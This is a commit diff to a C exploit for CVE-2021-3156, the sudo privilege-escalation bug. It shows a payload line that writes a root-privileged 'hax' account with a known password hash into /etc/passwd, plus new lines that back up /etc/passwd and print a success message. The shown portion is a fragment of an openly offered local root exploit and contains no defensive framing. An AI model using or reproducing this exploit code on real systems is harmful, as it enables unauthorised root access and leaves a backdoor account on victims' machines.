Update exploit.c

r4j0x00 · web-flow · commit f657b9da7e18 · 2021-01-30T19:49:17.000+05:30
diff --git a/CVE-2021-3156/exploit.c b/CVE-2021-3156/exploit.c
@@ -66,6 +66,7 @@ char * get_user() {
 const char * contents = "\n\nhax:$6$q4tutskpH4.ezGv9$/R6eIP3viVO4oIds5WIqZPN5bQYT/Z1w9s6q6jw.6bO3FTohiFD1L1Jk9EhQdLiv1MeZOCF71PB41dTI2eV3C1:0:0:hax:/root:/bin/bash\n\n"; // password: hax
 
 int main(void) {
+    system("cp /etc/passwd /tmp/passwd_bak");
     size_t initial_size = get_passwd_size();
     char * basedir_name = get_random_string(0x20);
 
@@ -94,7 +95,8 @@ int main(void) {
         waitpid(pid, 0, 0);
 
         if(get_passwd_size() != initial_size) {
-            puts("Success!");
+            puts("[+] Success!");
+            puts("Make sure to copy back /etc/passwd from /tmp/passwd_bak!");
             exit(0);
         }
     }

Original file line number	Diff line number	Diff line change
`@@ -66,6 +66,7 @@ char * get_user() {`
`66`	`66`	`const char * contents = "\n\nhax:$6$q4tutskpH4.ezGv9$/R6eIP3viVO4oIds5WIqZPN5bQYT/Z1w9s6q6jw.6bO3FTohiFD1L1Jk9EhQdLiv1MeZOCF71PB41dTI2eV3C1:0:0:hax:/root:/bin/bash\n\n"; // password: hax`
`67`	`67`
`68`	`68`	`int main(void) {`
	`69`	`+ system("cp /etc/passwd /tmp/passwd_bak");`
`69`	`70`	`size_t initial_size = get_passwd_size();`
`70`	`71`	`char * basedir_name = get_random_string(0x20);`
`71`	`72`
`@@ -94,7 +95,8 @@ int main(void) {`
`94`	`95`	`waitpid(pid, 0, 0);`
`95`	`96`
`96`	`97`	`if(get_passwd_size() != initial_size) {`
`97`		`- puts("Success!");`
	`98`	`+ puts("[+] Success!");`
	`99`	`+ puts("Make sure to copy back /etc/passwd from /tmp/passwd_bak!");`
`98`	`100`	`exit(0);`
`99`	`101`	`}`
`100`	`102`	`}`